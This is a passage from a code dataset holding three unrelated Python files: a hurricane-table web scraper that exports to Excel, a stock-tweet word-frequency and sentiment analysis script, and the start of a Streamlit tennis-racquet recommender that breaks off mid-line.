After close, and then Try.\")\n exit()\n\ntitle = ['Name of Storm', 'No', 'Type', 'Estimated Landfall', 'Estimated Max Winds', 'Severity'] # colums in a table\n\nisRepeated = True\n\nresults = []\n\nwhile isRepeated:\n strInputState = input('Input your state\\n')\n strInputType = input('Input the type \"H\", \"MH\", \"TS\", \"ALL\"\\n')\n###---------the processing for first url----------------------\n try:\n request = urllib.request.Request(url1) # make a request(get) for fetching html page.\n response = urllib.request.urlopen(request) # get a handle of html page by using the requst.\n html_doc = response.read() # read a page in style of text, \n except Exception as ee: # if some exception is occured\n print(ee)\n print(\"Request Error.\")\n input('Press Enter to exit.')\n exit()\n\n def handleCellStr(_strCell, _bDelBar = True): # a function for processing a cell of table.\n strCell = _strCell.replace('\\t', '')\n strCell = strCell.replace('\\n', '')\n if _bDelBar == True:\n strCell = strCell.replace('-', '')\n strCell = strCell.replace(' ', '')\n return strCell\n\n\n # html page have to be converted into lxml\n bs_soup = BeautifulSoup(html_doc, \"lxml\")\n tag_lines = None\n try: # look for a part for analysation.\n tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find('div').find('font').find('table').findAll('tr')\n except Exception as ee:\n print(ee)\n print(\"No lines.\")\n input('Press Enter to exit.')\n exit()\n\n # if data is null,\n if tag_lines == None or len(tag_lines) == 0:\n print(\"No Content\")\n input('Press Enter to exit.')\n exit()\n\n # get a real values from data \n tag_lines = tag_lines[2:]\n for tr_line in tag_lines:\n line_cells = tr_line.find_all('td')\n if line_cells == None or len(line_cells) != 12:\n continue\n strDate = line_cells[0].text\n strTime = line_cells[1].text\n strLatitude = line_cells[2].text\n strLongitude = line_cells[3].text\n strMaxWinds = line_cells[4].text\n strSSHWS = line_cells[5].text\n strRMWnm = line_cells[6].text\n strCentralPressure = line_cells[7].text\n strOCI = line_cells[8].text\n strSize = line_cells[9].text\n strStates = line_cells[10].text\n strStormNames = line_cells[11].text\n\n strDate = handleCellStr(strDate, False)\n strTime = handleCellStr(strTime)\n strLatitude = handleCellStr(strLatitude)\n strLongitude = handleCellStr(strLongitude)\n strMaxWinds = handleCellStr(strMaxWinds)\n strSSHWS = handleCellStr(strSSHWS)\n strRMWnm = handleCellStr(strRMWnm)\n strCentralPressure = handleCellStr(strCentralPressure)\n strOCI = handleCellStr(strOCI)\n strSize = handleCellStr(strSize)\n strStates = handleCellStr(strStates)\n strStormNames = handleCellStr(strStormNames)\n \n # For the changing of date style\n while True:\n try:\n temp = strDate[len(strDate) - 1:]\n nTemp = int(temp)\n break\n except Exception as e:\n strDate = strDate[:len(strDate) - 1]\n \n strNoFront = format(int(strDate.split('-')[0]), '02d')\n strNo = strDate[len(strDate) - 2:] + '-' + strNoFront\n strModifedDate = strDate.split('-')[1]\n \n # look for a data that is stable for given state.\n bState = False\n strStateLast = ''\n strSeverity = ''\n if strStates.find(',') > -1:\n nList = [0]\n strStateItems = strStates.split(',')\n for strStateOne in strStateItems:\n if strStateOne.find(strInputState) > -1:\n strSeverity = strStateOne\n bState = True\n nList.append(int(strStateOne[len(strStateOne) - 1:]))\n strStateLast = str(max(nList))\n else:\n strSeverity = strStates\n if strStates.find(strInputState) > -1:\n bState = True\n strStateLast = strStates[len(strStates) 
- 1:]\n \n if bState == False:\n continue\n \n # from the number, get the some characters such as TS, H, MH and so on.\n\n strType = ''\n if strStateLast == '1':\n strType = 'TS'\n elif strStateLast == '2':\n strType = 'H'\n elif strStateLast == '3':\n strType = 'MH'\n elif strStateLast == '4':\n strType = 'MH'\n elif strStateLast == '5':\n strType = 'MH'\n\n if strType == strInputType or strInputType == \"ALL\":\n # for exporting to file, produce a line in the style of table column.\n line = [strStormNames, strNo, strType, strModifedDate, strMaxWinds, strSeverity]\n # collect the lines \n results.append(line)\n \n \n\n\n\n\n ###---------the processing for second url----------------------\n\n\n\n try:\n request = urllib.request.Request(url2)\n response = urllib.request.urlopen(request)\n html_doc = response.read()\n except Exception as ee:\n print(ee)\n print(\"Request Error.\")\n input('Press Enter to exit.')\n exit()\n\n def handleCellStr(_strCell, _bDelBar = True):\n strCell = _strCell.replace('\\t', '')\n strCell = strCell.replace('\\n', '')\n if _bDelBar == True:\n strCell = strCell.replace('-', '')\n strCell = strCell.replace(' ', '')\n return strCell\n\n\n # html_file = open(\"response.txt\", \"r\")\n # html_doc = html_file.read()\n # bs_soup = BeautifulSoup(html_doc, \"html.parser\")\n bs_soup = BeautifulSoup(html_doc, \"lxml\")\n tag_lines = None\n try:\n tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find('div').find('center').find('table').findAll('tr')\n \n # tag_lines = bs_soup.find('td', {'id': 'tdcontent'}).find_all('tr')\n except Exception as ee:\n print(ee)\n print(\"No lines.\")\n input('Press Enter to exit.')\n exit()\n\n if tag_lines == None or len(tag_lines) == 0:\n print(\"No Content\")\n input('Press Enter to exit.')\n exit()\n\n tag_lines = tag_lines[2:]\n idx = 0\n for tr_line in tag_lines:\n idx += 1\n line_cells = tr_line.find_all('td')\n if len(line_cells) != 7 and len(line_cells) != 8:\n continue\n #print(line_cells)\n strStorm = line_cells[0].text\n strDate = line_cells[1].text\n strTime = line_cells[2].text\n strLatitude = line_cells[3].text\n strLongitude = line_cells[4].text\n strMaxWinds = line_cells[5].text\n strStates = line_cells[6].text\n strStormNames = \"\"\n if len(line_cells) > 7:\n strStormNames = line_cells[7].text\n\n strStrom = handleCellStr(strStorm)\n strDate = handleCellStr(strDate, False)\n strTime = handleCellStr(strTime)\n strLatitude = handleCellStr(strLatitude)\n strLongitude = handleCellStr(strLongitude)\n strMaxWinds = handleCellStr(strMaxWinds)\n strStates = handleCellStr(strStates)\n strStormNames = handleCellStr(strStormNames)\n\n \n while True:\n try:\n temp = strDate[len(strDate) - 1:]\n nTemp = int(temp)\n break\n except Exception as e:\n strDate = strDate[:len(strDate) - 1]\n \n strNoFront = format(int(strStorm), '02d')\n strNo = strDate[len(strDate) - 2:] + '-' + strNoFront\n \n bState = False\n strStateLast = ''\n strSeverity = ''\n\n if strStates.find('/') > -1:\n nList = [0]\n strStateItems = strStates.split('/')\n for strStateOne in strStateItems:\n if strStateOne.find(strInputState) > -1:\n strSeverity = strStateOne\n bState = True\n strStateLast = str(max(nList))\n else:\n strSeverity = strStates\n if strStates.find(strInputState) > -1:\n bState = True\n strStateLast = strStates[len(strStates) - 1:]\n \n if bState == False:\n continue\n \n strType = 'TS'\n if strType == strInputType or strInputType == \"ALL\":\n line = [ strStormNames, strNo, strType, strDate, strMaxWinds, strSeverity]\n results.append(line)\n\n 
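# Both data sources have been scraped for this query; ask whether to run another state/type search.\n    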
isOK = input(\"Are you going to repeat? You can input 'y' or 'n'. \\n\")\n if isOK == 'y':\n isRepeated = True\n else:\n isRepeated = False\n # conclude columns and results to export to excel.\n\ndf = pd.DataFrame(results, columns=title)\n # export the data into excel, filename, sheet->hurricane.\ndf.to_excel(export_xlsfname, sheet_name='hurricane', index=False)\n\n # if it is completed, print the text as follows.\ninput('Press Enter to exit.')","repo_name":"Eagle9461/Hurrican_Analysis","sub_path":"hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4790593066","text":"import pandas as pd\nimport datetime\nfrom nltk.corpus import stopwords\nimport string\nimport re\nimport nltk\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem import PorterStemmer\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport operator\nimport collections\n\n# define the variables of the program\nlemma = WordNetLemmatizer()\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\nps = PorterStemmer()\n\n\nfacebook = pd.read_csv(\"fb.csv\", lineterminator='\\n')\namazon = pd.read_csv(\"amzn.csv\", lineterminator='\\n')\napple = pd.read_csv(\"appl.csv\", lineterminator='\\n')\ngoogle = pd.read_csv(\"goog.csv\", lineterminator='\\n')\ntesla = pd.read_csv(\"tsla.csv\", lineterminator='\\n')\nnetflix = pd.read_csv(\"nflx.csv\", lineterminator='\\n')\nlist_stocks = [facebook, amazon, apple, google, tesla, netflix]\nlist_names_stocks = [\"facebook\", \"amazon\", \"apple\", \"google\", \"tesla\", \"netflix\"]\n\n'''\ndef change_format_of_dates_line(row):\n \"\"\"\n the function converts the format of the days of the dataframe\n :param row: the chosen row\n :return: a formatted string\n \"\"\"\n try:\n temp = datetime.datetime.strptime(row, '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d')\n return temp\n except Exception:\n return \"2021-01-01\"\n'''\n\n\ndef change_format_of_dates_slash(row):\n \"\"\"\n the function converts the format of the days of the dataframe\n :param row: the chosen row\n :return: a formatted string\n \"\"\"\n try:\n temp = datetime.datetime.strptime(row, '%m/%d/%Y %H:%M').strftime('%Y-%m-%d')\n return temp\n except Exception:\n return \"2021-01-01\"\n\n\namazon['date'] = amazon['date'].apply(change_format_of_dates_slash)\nnetflix['date'] = netflix['date'].apply(change_format_of_dates_slash)\ntesla['date'] = tesla['date'].apply(change_format_of_dates_slash)\nfacebook['date'] = facebook['date'].apply(change_format_of_dates_slash)\napple['date'] = apple['date'].apply(change_format_of_dates_slash)\ngoogle['date'] = google['date'].apply(change_format_of_dates_slash)\n\n# convert the string column to a datetime column\nfor df, name in zip(list_stocks, list_names_stocks):\n try:\n print(f\"Dataframe Name: {name}\")\n print(f\"Number of records before the cleaning process: {df.shape}\")\n df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d %H:%M:%S')\n df = df[(df['date'] >= '2021-05-04') & (df['date'] <= '2021-05-11')]\n print(f\"Number of records after filtering dates: {df.shape}\")\n df = df.drop_duplicates(subset='tweet', keep=\"last\")\n print(f\"Number of records after removing duplicates: {df.shape}\")\n list_stocks.append(df)\n except Exception:\n df['date'] = pd.to_datetime(df['date'], format='%m/%d/%Y %H:%M')\n df = df[(df['date'] >= '5/4/2021') & (df['date'] <= '5/11/2021')]\n print(f\"Number of 
records after filtering dates: {df.shape}\")\n        df = df.drop_duplicates(subset='tweet', keep=\"last\")\n        print(f\"Number of records after removing duplicates: {df.shape}\")\n        list_stocks.append(df)\n    print()\n\n\nlist_stocks = list_stocks[6:]  # keep the filtered frames appended above, not the six unprocessed originals\n\nfor item in list_stocks:\n    print(item.shape)\n# Code from the lecture in order to clean the tweets\n\npunctuation = list(string.punctuation)\nstop = stopwords.words('english') + punctuation + ['rt', 'via', 'the', u'\\u2019', u'\\u2026',\n                                                   'The', u'de', u'\\xe9',\n                                                   'ï', '¿', '\\u200d', '\\u200b']\n\nemoticons_str = r\"\"\"\n    (?:\n        [:=;] # Eyes\n        [oO\\-]? # Nose (optional)\n        [D\\)\\]\\(\\]/\\\\OpP] # Mouth\n    )\"\"\"\n\nregex_str = [\n    emoticons_str,\n    r'<[^>]+>', # HTML tags\n    r'(?:@[\\w_]+)', # @-mentions\n    r\"(?:\\#+[\\w_]+[\\w\\'_\\-]*[\\w_]+)\", # hash-tags\n    r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs\n\n    r'(?:(?:\\d+,?)+(?:\\.?\\d+)?)', # numbers\n    r\"(?:[a-z][a-z'\\-_]+[a-z])\", # words with - and '\n    r'(?:[\\w_]+)', # other words\n    r'(?:\\S)' # anything else\n]\n\ntokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE)\nemoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE)\n\n\ndef transform_tweets_to_tokens(tweets):\n    \"\"\"\n    the function takes a list of tweets and separates each one into tokens\n    :param tweets: a list of tweet strings\n    :return: a list of token lists\n    \"\"\"\n    tweets_tokens = [preprocess(tweet, True, False) for tweet in tweets]\n    return tweets_tokens\n\n\ndef tokenize(s):\n    \"\"\"\n    the function takes a string and matches it against the token regexes\n    :param s: a string\n    :return: the list of regex matches (emoticons are kept intact, for example)\n    \"\"\"\n    try:\n        return tokens_re.findall(s)\n    except Exception:\n        return None\n\n\ndef normalize_word(text, removeSpecial=False):\n    \"\"\"\n    the function removes stopwords from the tokens and lemmatizes them\n    :param text: the tokens of the tweet\n    :param removeSpecial: tells the function to strip special characters as well\n    :return: normalized tokens\n    \"\"\"\n    exclude = set(string.punctuation)\n    stop_free = []\n    if removeSpecial:\n        no_special = [CleanTweet(t) for t in text]\n        stop_free = [i.strip() for i in no_special if i not in stop and i]\n    else:\n        stop_free = [i.strip() for i in text if i not in stop and i]\n    normalized = [lemma.lemmatize(word) for word in stop_free]\n    return normalized\n\n\ndef CleanTweet(tweet):\n    \"\"\"\n    the function strips unwanted characters from a token and normalizes its format\n    :param tweet: the string of the tweet\n    :return: a clean and formatted token\n    \"\"\"\n    tweet = tweet.lower()\n    tweet = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', tweet, flags=re.MULTILINE)\n    tweet = re.sub(r'\\.', ' . ', tweet)\n    tweet = re.sub(r'\\!', ' !', tweet)\n    tweet = re.sub(r'\\?', ' ?', tweet)\n    tweet = re.sub(r'\\,', ' ,', tweet)\n    tweet = re.sub(r':', ' : ', tweet)\n    tweet = re.sub(r'#', ' # ', tweet)\n    tweet = re.sub(r'@', ' @ ', tweet)\n    tweet = re.sub(r' amp ', ' and ', tweet)\n    tweet = re.sub(r' . . . ', ' ', tweet)\n    tweet = re.sub(r' . . . ', ' ', tweet)\n    tweet = re.sub(r' ! ! ', ' ! 
', tweet)\n    tweet = re.sub(r'&', 'and', tweet)\n    tweet = re.sub('[^A-Za-z0-9]+', '', tweet)\n    return tweet\n\n\ndef preprocess(s, lowercase=False, toStringList=False):\n    \"\"\"\n    the function preprocesses a single tweet so we can compute additional statistics\n    :param s: the string of the tweet\n    :param lowercase: boolean for lowercase conversion\n    :param toStringList: whether to convert the tokens back to a string\n    :return: string or separated tokens\n    \"\"\"\n    tokens = tokenize(s)\n    if not tokens:\n        return \"\"\n    if lowercase:\n        tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]\n    if toStringList:\n        tokens = normalize_word(tokens, True)\n    else:\n        tokens = normalize_word(tokens)\n    if toStringList:\n        tokens = [x for x in tokens if x]\n        tokens = ' '.join(tokens)\n    return tokens\n\n\ndef find_all_hashtags(row):\n    \"\"\"\n    the function finds all of the hashtags in a tweet\n    :param row: a single tweet\n    :return: list of hashtags\n    \"\"\"\n    try:\n        hashtags = [i for i in row.split() if i.startswith(\"#\")]\n        return hashtags\n    except Exception:\n        return []\n\n\ndef find_all_tags(row):\n    \"\"\"\n    the function finds all of the tags in a tweet\n    :param row: a single tweet\n    :return: list of tags\n    \"\"\"\n    try:\n        tags = [i for i in row.split() if i.startswith(\"@\")]\n        return tags\n    except Exception:\n        return []\n\n\ndef create_df_from_list_tuple(list_tup):\n    \"\"\"\n    converts a list of tuples into a df\n    :param list_tup: list of tuple (word, number)\n    :return: a df\n    \"\"\"\n    list1, list2 = zip(*list_tup)\n    df = pd.DataFrame(list1, columns=['word'])\n    df['frequency'] = list2\n    return df\n\n\ndef create_df_from_list_tuple_two_words(list_tup):\n    \"\"\"\n    converts a list of tuples into a df\n    :param list_tup: list of tuple (word,word,number)\n    :return: a df\n    \"\"\"\n    list1, list2 = zip(*list_tup)\n    df = pd.DataFrame(list(list1), columns=['first word', 'second word'])\n    df['frequency'] = list2\n    return df\n\n\ndef validate_top_unigrams(l_unigrams):\n    \"\"\"\n    the function validates the top 10 list of unigrams\n    :param l_unigrams: the list of unigrams\n    :return: the top 10 validated unigrams\n    \"\"\"\n    counter = 0\n    verified_list = []\n    for p in l_unigrams:\n        if p[0] and p[0] != '️' and p[0] != 'quot':\n            verified_list.append(p)\n            counter = counter + 1\n        if counter == 10:\n            break\n    return verified_list\n\n\ndef validate_top_bigrams(l_bigrams):\n    \"\"\"\n    the function validates the top 10 list of bigrams\n    :param l_bigrams: the list of bigrams\n    :return: the top 10 validated bigrams\n    \"\"\"\n    counter = 0\n    verified_list = []\n    for p in l_bigrams:\n        exp = p[0]\n        if exp[0] != '' and exp[0] != 'lt' and exp[1] != '️':\n            verified_list.append(p)\n            counter = counter + 1\n        if counter == 10:\n            break\n    return verified_list\n\n\n\ndef show_most_common_terms(df):\n    \"\"\"\n    the function shows the most common terms in each of the df\n    :param df: the df\n    :return: 2 df of common terms (prints it)\n    \"\"\"\n    # transform the strings to tokens\n    tokens = transform_tweets_to_tokens(df['tweet'].values)\n    flat_tokens = [item for sublist in tokens for item in sublist]\n\n    # top 10 most common terms\n    tokens_unigrams = nltk.FreqDist(flat_tokens)\n    tokens_bigrams = nltk.FreqDist(nltk.bigrams(flat_tokens))\n    top_10_unigrams = validate_top_unigrams(tokens_unigrams.most_common(50))\n    top_10_bigrams = validate_top_bigrams(tokens_bigrams.most_common(50))\n    df_unigrams = create_df_from_list_tuple(top_10_unigrams)\n    print(df_unigrams)\n    df_bigrams = create_df_from_list_tuple_two_words(top_10_bigrams)\n    
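# Print the bigram table alongside the unigram table above.\n    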
print(df_bigrams)\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n print(f\"The most common terms of {name} stock are:\")\n print()\n show_most_common_terms(df)\n print()\n\n\ndef show_most_popular_tags_hashtags(df):\n \"\"\"\n the function print the most common hashtags and tags in a df\n :param df: a df\n :return: print the most common hashtags and tags\n \"\"\"\n all_tweets = df.loc[df['tweet'] != None]\n all_tweets['all_hashtags'] = all_tweets['tweet'].apply(find_all_hashtags)\n all_tweets['all_tags'] = all_tweets['tweet'].apply(find_all_tags)\n\n tweet_hashtags = list(all_tweets['all_hashtags'])\n tweet_tags = list(all_tweets['all_tags'])\n\n # create one flat list\n flat_hashtags = [item for sublist in tweet_hashtags for item in sublist]\n flat_tags = [item for sublist in tweet_tags for item in sublist]\n\n count_hashtags = Counter(flat_hashtags)\n count_tag = Counter(flat_tags)\n\n df1 = pd.DataFrame(count_hashtags.items(), columns=['Hashtag', 'Count']).sort_values(by=['Count'], ascending=False)\n df2 = pd.DataFrame(count_tag.items(), columns=['Tag', 'Count']).sort_values(by=['Count'], ascending=False)\n\n df1 = df1[df1.Hashtag.apply(lambda x: len(str(x))>1)]\n df2 = df2[df2.Tag.apply(lambda x: len(str(x))>1)]\n\n blankIndex = [''] * len(df1)\n df1.index = blankIndex\n blankIndex = [''] * len(df2)\n df2.index = blankIndex\n\n print()\n print(\"Most popular hashtags:\")\n print()\n print(df1.head(10))\n print()\n print(\"Most popular tags:\")\n print(df2.head(10))\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n print(f\"The most common Hashtags and Tags of {name} stock are:\")\n print()\n show_most_popular_tags_hashtags(df)\n print()\n\n\ndef sum_tweets_per_day(list_stocks, list_names_stocks):\n \"\"\"\n the function sums the number of tweets per day\n :param list_stocks: the list of stocks we want to count\n :param list_names_stocks: the names of the stocks\n :return: a list of df\n \"\"\"\n list_amount_tweets = []\n for df, name in zip(list_stocks, list_names_stocks):\n print(f\"Count per day in {name}:\")\n sum_tweets_per_day = df.groupby('date')['tweet'].count().reset_index(name=\"count\")\n list_amount_tweets.append(sum_tweets_per_day)\n print(sum_tweets_per_day)\n print()\n return list_amount_tweets\n\n\nlist_tweets_per_day = sum_tweets_per_day(list_stocks, list_names_stocks)\n\n\ndef autolabel(ax, rects):\n \"\"\"\n Attach a text label above each bar in *rects*, displaying its height\n :param ax: the plot object\n :param rects: the labels\n :return: formatted labels\n \"\"\"\n for rect in rects:\n height = round(rect.get_height(),2)\n ax.annotate('{}'.format(height),\n xy=(rect.get_x() + rect.get_width() / 2, height),\n xytext=(0, 3), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n\n\ndef cut_label_trends(data):\n \"\"\"\n the function takes the full date labels and converts the year into a short view\n :param data: the label\n :return: a new short label\n \"\"\"\n labels = []\n for i in data:\n temp = i.strftime('%Y-%m-%d')\n labels.append(temp)\n return labels\n\n\ndef show_plots_of_compare(results, title):\n \"\"\"\n the function creates the plot\n :param results: a list of tuple\n :param title: the title of the plot\n :return: the plot\n \"\"\"\n results = [[x[i] for x in results] for i in range(7)]\n # [facebook, amazon, apple, google, tesla, netflix]\n days, tweets_facebook, tweets_amazon, tweets_apple,\\\n tweets_google, tweets_tesla, tweets_netflix = results\n tweets_facebook_g = np.array(tweets_facebook) 
/ np.max(tweets_facebook)\n tweets_amazon_g = np.array(tweets_amazon) / np.max(tweets_amazon)\n tweets_apple_g = np.array(tweets_apple) / np.max(tweets_apple)\n tweets_google_g = np.array(tweets_google) / np.max(tweets_google)\n tweets_tesla_g = np.array(tweets_tesla) / np.max(tweets_tesla)\n tweets_netflix_g = np.array(tweets_netflix) / np.max(tweets_netflix)\n\n\n labels = []\n for b, c, d, e, f, g in zip(tweets_facebook_g, tweets_amazon_g, tweets_apple_g,\n tweets_google_g, tweets_tesla_g, tweets_netflix_g):\n labels.append(round(b,2))\n labels.append(round(c,2))\n labels.append(round(d,2))\n labels.append(round(e,2))\n labels.append(round(f,2))\n labels.append(round(g,2))\n\n a = np.arange(8)\n w = 0.1\n fig, ax = plt.subplots(figsize=(30, 7), edgecolor='k')\n ax.set_xticklabels(days)\n p1 = ax.bar(a+w, tweets_facebook_g, w, color='cornflowerblue')\n p2 = ax.bar(a-w, tweets_amazon_g, w, color='peachpuff')\n p3 = ax.bar(a+2*w, tweets_apple_g, w, color='lightpink')\n p4 = ax.bar(a-2*w, tweets_google_g, w, color='lightyellow')\n p5 = ax.bar(a+3*w, tweets_tesla_g, w, color='peachpuff')\n p6 = ax.bar(a, tweets_netflix_g, w, color='lightcoral')\n ax.set_xticks(a)\n ax.set_title(title)\n # Evaluation of the models\n ax.legend((p1[0], p2[0], p3[0], p4[0], p5[0], p6[0]),\n ('facebook', 'amazon', 'apple', 'google', 'tesla', 'netflix'))\n plt.xlabel('Days')\n plt.ylabel('Ratio number of tweets')\n autolabel(ax, p1)\n autolabel(ax, p2)\n autolabel(ax, p3)\n autolabel(ax, p4)\n autolabel(ax, p5)\n autolabel(ax, p6)\n plt.show()\n\nfacebook_count_days, amazon_count_days, apple_count_days, google_count_days,\\\ntesla_count_days, netflix_count_days = list_tweets_per_day\n\n\nall_data_to_graph = []\nnew_labels = cut_label_trends(facebook_count_days['date'])\nfor a, b, c, d, e, f, g in zip(list(new_labels),\n list(facebook_count_days['count']),\n list(amazon_count_days['count']),\n list(apple_count_days['count']),\n list(google_count_days['count']),\n list(tesla_count_days['count']),\n list(netflix_count_days['count'])):\n all_data_to_graph.append((a,b,c,d,e,f,g))\nprint(all_data_to_graph)\nshow_plots_of_compare(all_data_to_graph, 'Visual Compare between the days')\n\n# GOOGLE TRENDS\n\ndef cut_label_google_trends(row):\n \"\"\"\n converts the date from google trends csv to new format\n :param row: the row in the df\n :return: a new formatted date\n \"\"\"\n values = row.split(\"/\")\n month = values[0]\n day = values[1]\n return str(day)+\"-\"+str(month)+\"-21\"\n\ngoogle_trend = pd.read_csv(\"google_trends.csv\")\ngoogle_trend['date'] = google_trend['date'].apply(cut_label_google_trends)\ngoogle_trend = google_trend.set_index(['date'])\nlines = google_trend.plot.line()\nplt.title(\"Google Trends per day\")\nplt.ylabel(\"Ratio amount of searches\")\nplt.legend(bbox_to_anchor=(0.9, 0.6))\nplt.show()\n\n# TRENDS OF TWEETS\n\ndef prepare_dictionary(list_of_words):\n \"\"\"\n gets a list of words and creates a set after normalizing the list\n :param list_of_words: the list of words\n :return: a set\n \"\"\"\n stop_free = [i.strip() for i in list_of_words if i not in stop and i and i == i]\n lower_case = [word.lower() for word in stop_free if word and word == word]\n normalized = [lemma.lemmatize(word) for word in lower_case if word]\n new_set = set(normalized)\n return new_set\n\ndictionary_of_stocks = pd.read_csv(\"stock_market_dictionary.csv\")\nset_negative = prepare_dictionary(list(dictionary_of_stocks['Negative']))\nset_positive = 
prepare_dictionary(list(dictionary_of_stocks['Positive']))\nset_uncertainty = prepare_dictionary(list(dictionary_of_stocks['Uncertainty']))\n\n\ndef split_a_tweet(row):\n    \"\"\"\n    splits a tweet in a df\n    :param row: the tweet\n    :return: list of tokens\n    \"\"\"\n    return row.split()\n\n\ndef count_trend(row):\n    \"\"\"\n    counts how many positive, negative and uncertainty words from the stock market dictionary appear in a tweet\n    :param row: the token list of a df row\n    :return: the dominant trend label, or \"None\" if no dictionary word appears\n    \"\"\"\n    count_positive = 0\n    count_negative = 0\n    count_uncertainty = 0\n    if row:\n        if len(row) > 0:\n            for item in row:\n                if item in set_positive:\n                    count_positive += 1\n                elif item in set_negative:\n                    count_negative += 1\n                elif item in set_uncertainty:\n                    count_uncertainty += 1\n    if count_positive + count_negative + count_uncertainty == 0:\n        return \"None\"\n    stats = {\"positive\": count_positive, \"negative\": count_negative, \"uncertainty\": count_uncertainty}\n    result = max(stats.items(), key=operator.itemgetter(1))[0]\n    return result\n\n\nfor df, name in zip(list_stocks, list_names_stocks):\n    df['tokens'] = df['tweet'].apply(split_a_tweet)\n    df['tokens'] = df['tokens'].apply(normalize_word)\n    df['trend'] = df['tokens'].apply(count_trend)\n    c = collections.Counter(list(df['trend']))\n    print(f\"The distribution of trend of the stock {name} is:\")\n    print(c)\n    print()\n\n\ndef filter_trends(list_stocks):\n    \"\"\"\n    the function filters out the tweets that don't have any trend\n    :param list_stocks: the list of df of stocks\n    :return: a list of filtered df\n    \"\"\"\n    new_list_stocks = []\n    for df in list_stocks:\n        df = df[(df['trend'] != 'None')]\n        new_list_stocks.append(df)\n    return new_list_stocks\n\n\n\n# Trend Analysis for each stock\n\nlist_stocks_filtered = filter_trends(list_stocks)\n\ndef remove_r(row):\n    row = row.replace('\\r', \"\")\n    return row\n\nlist_sum_trends = []\nfor item, name in zip(list_stocks_filtered, list_names_stocks):\n    item['trend'] = item['trend'].apply(remove_r)\n    sum_tweets_per_day = item.groupby(['date','trend'])['trend'].count().reset_index(name=\"count_trend\")\n    cols = ['date', 'trend', 'count_trend']\n    sum_tweets_per_day.columns = cols\n    print(f\"The trends df of {name}:\")\n    print(sum_tweets_per_day)\n    print()\n    # sum_tweets_per_day.to_csv(\"summary_stocks_trends/trend_stock_\"+name+\".csv\", index=False)\n    list_sum_trends.append(sum_tweets_per_day)\n\n\ndef show_plots_of_compare_trends_stock(results, title):\n    \"\"\"\n    the function creates and shows the plot\n    :param results: a list of tuples\n    :param title: the title of the plot\n    :return: the plot\n    \"\"\"\n    results = [[x[i] for x in results] for i in range(4)]\n    # [days, positive, negative, uncertainty]\n    days, tweets_pos, tweets_neg, tweet_un = results\n    tweets_pos_g = np.array(tweets_pos)\n    tweets_neg_g = np.array(tweets_neg)\n    tweet_un_g = np.array(tweet_un)\n\n\n    labels = []\n    for b, c, d, in zip(tweets_pos_g, tweets_neg_g, tweet_un_g):\n        labels.append(round(b,2))\n        labels.append(round(c,2))\n        labels.append(round(d,2))\n\n    a = np.arange(8)\n    w = 0.1\n    fig, ax = plt.subplots(figsize=(30, 7), edgecolor='k')\n    ax.set_xticklabels(days)\n    p1 = ax.bar(a+w, tweets_pos_g, w, color='cornflowerblue')\n    p2 = ax.bar(a-w, tweets_neg_g, w, color='peachpuff')\n    p3 = ax.bar(a, tweet_un_g, w, color='lightpink')\n    ax.set_xticks(a)\n    ax.set_title(title)\n    # Evaluation of the models\n    ax.legend((p1[0], p2[0], p3[0]),\n              ('positive', 'negative', 'uncertainty'))\n    plt.xlabel('Days')\n    plt.ylabel('Ratio number of tweets')\n    autolabel(ax, p1)\n    
autolabel(ax, p2)\n autolabel(ax, p3)\n plt.show()\n\nfor item, name in zip(list_sum_trends, list_names_stocks):\n pos = item[(item['trend'] == 'positive')]\n neg = item[(item['trend'] == 'negative')]\n uncertainty = item[(item['trend'] == 'uncertainty')]\n list_pos = list(pos['count_trend'])\n list_neg = list(neg['count_trend'])\n list_uncertainty = list(uncertainty['count_trend'])\n print(list_pos)\n print(list_neg)\n print(list_uncertainty)\n all_data_to_graph = []\n new_labels = ['04-05-21', '05-05-21', '06-05-21', '07-05-21',\n '08-05-21', '09-05-21', '10-05-21', '11-05-21']\n for a, b, c, d in zip(list(new_labels),\n list(list_pos),\n list(list_neg),\n list(list_uncertainty)):\n all_data_to_graph.append((a, b, c, d))\n print(all_data_to_graph)\n show_plots_of_compare_trends_stock(all_data_to_graph, name+\"- trend analysis\")\n\n","repo_name":"tomersein/AlgoTradeProject","sub_path":"AlgoTrade.py","file_name":"AlgoTrade.py","file_ext":"py","file_size_in_byte":22071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16240432681","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity\n\ndef recommend_racquets(user_preferences, df, N=5):\n # Create a DataFrame with user preferences\n user_df = pd.DataFrame(user_preferences, index=[0])\n\n # Fill missing values with mean for numeric columns and replace infinity with maximum finite value\n df_numeric = df.select_dtypes(include=[np.number])\n df_filled = df.copy()\n df_filled[df_numeric.columns] = df_numeric.fillna(df_numeric.mean()).replace([np.inf, -np.inf], np.finfo('float64').max)\n\n user_df_filled = user_df.copy()\n user_df_filled[df_numeric.columns] = user_df[df_numeric.columns].fillna(df_numeric.mean()).replace([np.inf, -np.inf], np.finfo('float64').max)\n\n # Compute cosine similarity between user preferences and racquets\n similarity_scores = cosine_similarity(user_df_filled[df_numeric.columns], df_filled[df_numeric.columns])\n\n # Get indices of top N racquets\n top_racquet_indices = similarity_scores[0].argsort()[-N:][::-1]\n\n # Return these racquets\n return df.iloc[top_racquet_indices]\n\n\n\n\n# Define mappings\nracquet_type_mapping = {\n 'All Around Racquets': 1.0,\n \"Traditional Player's Racquets\": 2.0,\n 'Spin Racquets': 3.0,\n 'Power Racquets': 